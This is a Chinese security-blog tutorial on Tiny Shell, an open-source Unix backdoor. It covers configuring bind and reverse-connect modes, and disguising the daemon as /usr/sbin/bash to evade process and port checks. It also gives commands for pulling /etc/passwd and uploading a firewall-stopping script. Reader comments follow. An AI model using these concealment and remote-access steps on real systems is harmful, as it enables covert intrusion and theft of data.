短小精干的Unix类后门Tiny shell的使用与分析

*本文原创作者:dapzxb41693,本文属FreeBuf原创奖励计划,未经许可禁止转载

0×00. 简介

Tiny Shell 是一款开源的Unix类后门shell工具,由C语言编写,体积小(在kali系统上编译后只有55K大小)

分为客户端和服务端,支持正向连接模式(即服务端在远程运行,hacker远程直接链接),和反弹连接模式(hacker在自己服务器监听,服务端链接hacker监听端口)

功能:

通信加密

支持上传、下载、直接反弹shell

下载地址:https://github.com/orangetw/tsh

具体使用与分析见下文

0×01. 使用与分析

源码很少,非常精简

一、正向连接模式使用与分析

I、编译前,你需要做以下设置

1.修改tsh.h中的secret的值

secret 的值用于加密 控制端和被控端之间通信的数据

和后门的所有的通信信息都会被AES加密

编译之后,客户端和服务端都会硬编码这个secret,用于解密数据

2.修改tsh.h中的SERVER_PORT值

SERVER_PORT是后门运行后监听的端口

3.修改tsh.h中的FAKE_PROC_NAME值

FAKE_PROC_NAME 是用于伪装显示后门运行后的进程名字,比如这里设置为/bin/bash,那么后门运行后,用ps -ef 或者netstat 查看,则显示的执行程序是/bin/bash,如下图所示

4.注释掉 如下两行代码

//#define CONNECT_BACK_HOST"10.1.100.3"

//#define CONNECT_BACK_DELAY 30

这两行注用于设置反弹链接模式,下面再介绍

修改好后的示例如下:

编译

make linux

make 后面跟的是系统类别,这里以linux为例

编译成功后,tsh为客户端,tshd为服务端

II、运行前的工作

1.执行以下命令

umask 077; HOME=/var/tmp

umask设置是为了运行后的后门shell环境而设置,后门shell所有创建的文件只有后门shell进程属主有权限,其他都没权限

2.修改tshd 为你要伪装显示的进程名字

这里修改成bash

mv tshd bash

如果不修改的话,直接运行后门进程,则使用lsof -i:8080 查看, COMMAND不会显示为tsh.h设置的伪装的进程名字

所以这里要修改一下可执行文件名字

然后再运行一下,执行lsof -i:8080 发现COMMAND变成了bash,这样迷惑性会更大一些

3.将后门文件移动至 /usr/sbin (当然也可移动到其他隐秘的地方,这里以/usr/sbin举例)

如果想要更加具有欺骗性的话,则需要把后门文件移动至/usr/sbin (系统自带的bash位于/bin/bash 和 /usr/bin/bash)

如果不移动的话,使用pwdx 进程ID 可以查看到后门进程所在的执行目录

移动到/usr/sbin之后,再运行,然后用pwdx 查看

显示在/usr/sbin, 欺骗性增加一些

III、运行使用

1. 直接获取被控端shell

服务端运行 (被控端. IP: 10.1.100.3, kali系统)

/usr/sbin/bash

: 服务端运行后,其父进程PID是1,也就是说这个进程是守护进程除非重启系统,或者手动关闭,否则一直存在(当然你也可以加入启动项,或者加入任务计划中)

客户端(控制端 10.1.100.2)

./tsh 10.1.100.3

但是执行之后,没反应,并没有返回远端的shell,奇怪,我未将tshd移动到/usr/sbin下保存为bash 是没事的,一切OK,测试正常,但是将tshd移动到/usr/sbin/bash 之后,客户端就链接不上,我决定查查代码, 查了一会儿,在tsh.c的236行找到了问题的原因

这里直接调用系统命令bash,而被控端的环境变量PATH值为:

/usr/local/jdk1.8/bin:/usr/local/jdk1.8/jre/bin:/usr/local/jdk1.8/bin:/usr/local/jdk1.8/jre/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/apache-ant-1.10.1/bin:/usr/local/gradle/bin

/usr/sbin 先于 /usr/bin/bash 和/bin/bash找到bash命令 ,于是我们知道我们执行了假的bash(就是我们自己的后门程序),所以这里解决办法就是修改源码,显示指定要执行命令的路径

重新编译执行,然后客户端再次连接

./tsh 10.1.100.3

成功,OK

2. 下载文件

除了可以直接连接上去外,这个后门还可以下载和上传文件

下载远程的/etc/passwd文件到当前目录

./tsh 10.1.100.3 get /etc/passwd .

3. 上传文件到远程被控端

上传

./tsh 10.1.100.3 put stop_fw.sh /tmp

远程查看上传成功

二、反向连接模式使用与分析

反向链接适用于被控制端位于防火墙后面,不允许外面直接连接,这就需要被控端从里从外主动连接

编译前的准备工作和 编译正向连接模式类似,不过 需要将如下两行去掉注释,即去掉//

#define CONNECT_BACK_HOST"10.1.100.3"

#define CONNECT_BACK_DELAY 30

CONNECT_BACK_HOST 表示反向连接的主机(就是被控端主动要连接的控制端的IP)这里设置反向连接的主机是10.1.100.3(kali 这里变成了控制端了)

CONNECT_BACK_DELAY 表示隔多久尝试连接控制端一次 (被控端会一直不断循环,尝试连接控制端,见下图代码,while 死循环)

位于被控端的后门运行之后,会一直尝试连接控制端 (下图为实际抓包)

1、编译

make linux

2、在控制端执行监听

./tsh cb

cb 表示反向监听模式

*本文原创作者:fnpimr43017,本文属FreeBuf原创奖励计划,未经许可禁止转载

将tshd 上传到被控端,重命名为bash,移动至/usr/sbin/bash

3、被控端执行后门 (10.1.100.2 )

/usr/sbin/bash

查看后门进程信息

被控端进程也是守护进程,PID为3082

大约30秒后(这个等待时间可在编译时设置,见上文),被控端shell就反弹到了控制端

然后此时查看被控端相关和后门相关进程信息:

其中 -bash 是真实的bash进程

这里的PID为3082、3147都是后门守护进程,伪装成了’/bin/bash’,PID为3148的进程是后门守护进程执行系统命令exec /bin/bash –login 反弹出来的shell进程

解释一下反弹shell之后,这里为什么会又出现一个守护进程(也就是pid为3147的进程)

回到最开始

执行后门 /usr/sbin/bash

执行之后,主进程会fork一个子进程(上面已经提到),父进程退出,这样fork出来的子进程就会成为孤儿进程被init托管(也就是pid为3048的进程)

当PID 为3048的这个进程成功连接上控制端监听的端口之后,则又fork一个进程用(姑且称之为子进程2)于处理建立好的连接(tshd.c代码 211行开始)

子进程2 又会新fork一个子进程(称之为子进程3),然后子进程2退出,子进程3成为孤儿进程,被init托管,成为守护进程,子进程3是真正用户处理连接后的交互

0×02. 总结

总的来说,Tiny shell 是一款非常不错的后门,体积小,功能够用,而且通信加密,源码也不是很复杂,大家有空可自行研究。

*本文原创作者:dapzxb41693,本文属FreeBuf原创奖励计划,未经许可禁止转载

发表评论

已有 8 条评论

  • 补丁君 (3级) 皮皮虾训练场长 2017-06-30 回复 1楼

    远控就是神奇。文中怎么作者变成“*本文原创作者:fnpimr43017”用户名这么随机吗?

    亮了( 3)
    • mksbvq60918 (1级) 2017-06-30 回复

      @ 补丁君 原文作者是:dapzxb41693 ,大兄弟

      亮了( 1)
    • mruajl76513 (1级) 2017-06-30 回复

      @ 补丁君 何必在意作者名字呢,也许作者不想留名呢,好好欣赏文章就行了

      亮了( 1)
  • mksbvq60918 (1级) 2017-06-30 回复 2楼

    给大佬递茶

    亮了( 1)
  • eval0day (4级) Freebuf手机贴膜出售 2017-06-30 回复 3楼

    还是觉得nc好使

    亮了( 2)
  • xxoo 2017-06-30 回复 4楼

    那么,问题来了,本文原作者到底是fnpimr43017还是dapzxb41693?

    亮了( 1)
  • sincoder (1级) 2017-07-01 回复 5楼

    关键是通信加密了

    亮了( 1)
  • ovel (1级) 2017-07-03 回复 6楼

    "…这样fork出来的子进程就会成为孤儿进程被init托管(也就是pid为3048的进程)" 是3148吧???

    亮了( 0)

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


用的openwrt路由器,家里宽带申请了动态公网ip,为了方便把2280端口映射到公网,发现经常被暴力破解,自己写了个临时封禁ip功能的脚本,实现5分钟内同一个ip登录密码错误10次就封禁这个ip5分钟,并且进行邮件通知使用步骤openwrt为19.07.03版本,其他版本没有测试过安装bashmsmtpopkg
#!/bin/bashcommand1&command2&wait从Shell脚本并行运行多个程序–杨河老李(kviccn.github.io)
1.先查出MAMP下面集成的PHP版本cd/Applications/MAMP/bin/phpls-ls 2.编辑修改.bash_profile文件(没有.bash_profile文件的情况下回自动创建)sudovim~/.bash_profile在文件的最后输入以下信息,然后保存退出exportPATH="/Applications/MAMP/bin/php/php7.2.20/b
1、先输入locale-a,查看一下现在已安装的语言2、若不存在如zh_CN之类的语言包,进行中文语言包装:apt-getinstalllanguage-pack-zh-hans3、安装好后我们可以进行临时修改:然后添加中文支持: locale-genzh_CN.UTF-8临时修改> export LC_ALL='zh_CN.utf8'> locale永久
BashPerlTclsyntaxdiff1.进制数表示Languagebinaryoctalhexadecimalbash2#[0~1]0[0~7]0x[0~f]or0X[0~f]perl0b[0~1]0[0~7]0x[0~f]tcl0b[0~1]0o[0~7]0x[0~f]bashdifferentbaserepresntationreference2.StringlengthLanguageStr
正常安装了k8s后,使用kubect工具后接的命令不能直接tab补全命令补全方法:yum-yinstallbash-completionsource/usr/share/bash-completion/bash_completionsource<(kubectlcompletionbash)echo"source<(kubectlcompletionbash)">>~/.bashrc 
参考这里启动jar包shell脚本修改过来的#!/bin/bash#默认应用名称defaultAppName='./gadmin'appName=''if[[$1&&$1!=0]]thenappName=$1elseappName=$defaultAppNamefiecho">>>>>>本次重启的应用:$appName<
#一个数字的行#!/bin/bashwhilereadlinedon=`echo$line|sed's/[^0-9]//g'|wc-L`if[$n-eq1]thenecho$linefidone<1.txt#日志切割归档#!/bin/bashcd/data/logslog=1.logmv_log(){[-f$1]&&mv$1$2
#文件增加内容#!/bin/bashn=0cat1.txt|whilereadlinedon=[$n+1]if[$n-eq5]thenecho$lineecho-e"#Thisisatestfile.\n#Testinsertlineintothisfile."elseecho$linefidone#备份/etc目录#
# su - oraclesu: /usr/bin/ksh: No such file or directory根据报错信息:显示无法找到文件 /usr/bin/ksh果然没有该文件,但是发现存在文件/bin/ksh,于是创建了一个软连接,可以规避问题,可以成功切换到用户下,但无法执行系统自带命令。$. .bash_profile-ksh: .: .b
history显示历史指令记录内容,下达历史纪录中的指令主要的使用方法如果你想禁用history,可以将HISTSIZE设置为0:#exportHISTSIZE=0使用HISTIGNORE忽略历史中的特定命令下面的例子,将忽略pwd、ls、ls-ltr等命令:#exportHISTIGNORE=”pwd:ls:ls-ltr:”使用HIS
一.命令历史  1.history环境变量:    HISTSIZE:输出的命令历史条数,如history的记录数    HISTFILESIZE:~/.bash_history保存的命令历史记录数    HISTFILLE:历史记录的文件路径    HISTCONTROL:     ignorespace:忽略以空格开头的命令
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的she
BashOne-LinersExplained,PartI:Workingwithfileshttps://catonmat.net/bash-one-liners-explained-part-oneBashOne-LinersExplained,PartII:Workingwithstringshttps://catonmat.net/bash-one-liners-explained-part-twoBashOne-LinersExplained,PartII
Shell中变量的作用域:在当前Shell会话中使用,全局变量。在函数内部使用,局部变量。可以在其他Shell会话中使用,环境变量。局部变量:默认情况下函数内的变量也是全局变量#!/bin/bashfunctionfunc(){a=99}funcecho$a输出>>99为了让全局变量变成局部变量
1、多命令顺序执行;  命令1;命令2  多个命令顺序执行,命令之间没有任何逻辑联系&&  命令1&&命令2  逻辑与,当命令1正确执行,才会执行命令2||  命令1||命令2  逻辑或,当命令1执行不正确,才会执行命令2例如:ls;date;cd/home/lsx;pwd;who ddif=输入文件of=输
原博文使用Linux或者unix系统的同学可能都对#!这个符号并不陌生,但是你真的了解它吗?首先,这个符号(#!)的名称,叫做"Shebang"或者"Sha-bang"。Linux执行文件时发现这个格式,会把!后的内容提取出来拼接在脚本文件或路径之前,当作实际执行的命令。 Shebang这个符号通常在Unix系统的脚本
1、历史命令history[选项][历史命令保存文件]选项:-c:  清空历史命令-w:  把缓存中的历史命令写入历史命令保存文件 ~/.bash_historyvim/etc/profile中的Histsize可改存储历史命令数量历史命令的调用使用上、下箭头调用以前的历史命令使用“!n”重复执行第n条历史
目录1.Shell脚本规范2.Shell脚本执行3.Shell脚本变量3.1环境变量3.1.1自定义环境变量3.1.2显示与取消环境变量3.1.3环境变量初始化与对应文件的生效顺序3.2普通变量3.2.1定义本地变量3.2.2shell调用变量3.2.3grep调用变量3.2.4awk调用变量3.3
   http://www.voidcn.com/blog/wszzdanm/article/p-6145895.html命令功能:显示登录用户的信息命令格式:常用选项:举例:w显示已经登录的用户及正在进行的操作[root@localhost~]#w 11:22:01up4days,21:22, 3users, loadaverage:0.00,0.00,0.00USER